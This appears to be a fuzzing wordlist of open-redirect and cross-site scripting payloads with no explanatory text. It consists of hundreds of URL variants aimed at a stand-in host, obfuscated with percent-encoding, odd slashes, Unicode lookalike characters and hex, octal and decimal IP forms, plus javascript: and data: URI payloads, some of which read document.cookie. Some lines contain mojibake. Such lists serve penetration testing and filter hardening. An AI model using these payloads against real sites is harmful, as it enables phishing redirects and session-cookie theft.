//localdomain.pw/%2f..
///localdomain.pw/%2f..
////localdomain.pw/%2f..
https://localdomain.pw/%2f..
/https://localdomain.pw/%2f..
//localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
//localdomain.pw/
///localdomain.pw/
////localdomain.pw/
https://localdomain.pw/
/https://localdomain.pw/
//localdomain.pw//
///localdomain.pw//
////localdomain.pw//
https://localdomain.pw//
//https://localdomain.pw//
//localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e
////localdomain.pw/%2e%2e
https:///localdomain.pw/%2e%2e
//https:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
///localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/%09/localdomain.pw
//%09/localdomain.pw
///%09/localdomain.pw
////%09/localdomain.pw
https://%09/localdomain.pw
/%5clocaldomain.pw
//%5clocaldomain.pw
///%5clocaldomain.pw
////%5clocaldomain.pw
https://%5clocaldomain.pw
/https://%5clocaldomain.pw
https://localdomain.pw
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
javascript:%0aalert`1`
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
http:localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
//\/localdomain.pw/
//localdomain%00.pw
";alert(0);//
http://0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
ã€±localdomain.pw
ã€µlocaldomain.pw
ã‚localdomain.pw
ãƒ¼localdomain.pw
ï½°localdomain.pw
/ã€±localdomain.pw
/ã€µlocaldomain.pw
/ã‚localdomain.pw
/ãƒ¼localdomain.pw
/ï½°localdomain.pw
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
<>javascript:alert(1);
<>//localdomain.pw
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
//;@localdomain.pw
//ï¹”@localdomain.pw
http://;@localdomain.pw
http://ï¹”@localdomain.pw
@localdomain.pw
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
//%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///\ï¹”@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
java%0ascript:alert(1)
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
javascript://%0aalert`1`
Javas%26%2399;ript:alert(1)aaaa</iframe></html>
%01https://localdomain.pw
http:%0a%0dlocaldomain.pw
https://%0a%0dlocaldomain.pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
\/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
<>//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%2f%2fâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%01https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
javascript:alert(document.domain)//://
/#//localdomain.pw
#//localdomain.pw
/#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https%3A/localdomain.pw
https%3A/;@localdomain.pw
https%3A/ï¹”@localdomain.pw
javascript:%250Aalert(1)
Â°/localdomain.pw
Â°/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////localdomainã€‚pw
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒã€‚ï¼°â“¦
//localdomain.pw?
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦?
//.@.@localdomain.pw
//.@.@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
javascript:new%20Function`al\ert\`1\``;
%09Jav%09ascript:alert(1)
javascript:alert(1)//localdomain.pw/
Javascript://%E2%80%A9alert(618)
%0A/localdomain.pw
%0A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2F/localdomain.pw
/%2F/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%252F@localdomain.pw
%252F@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦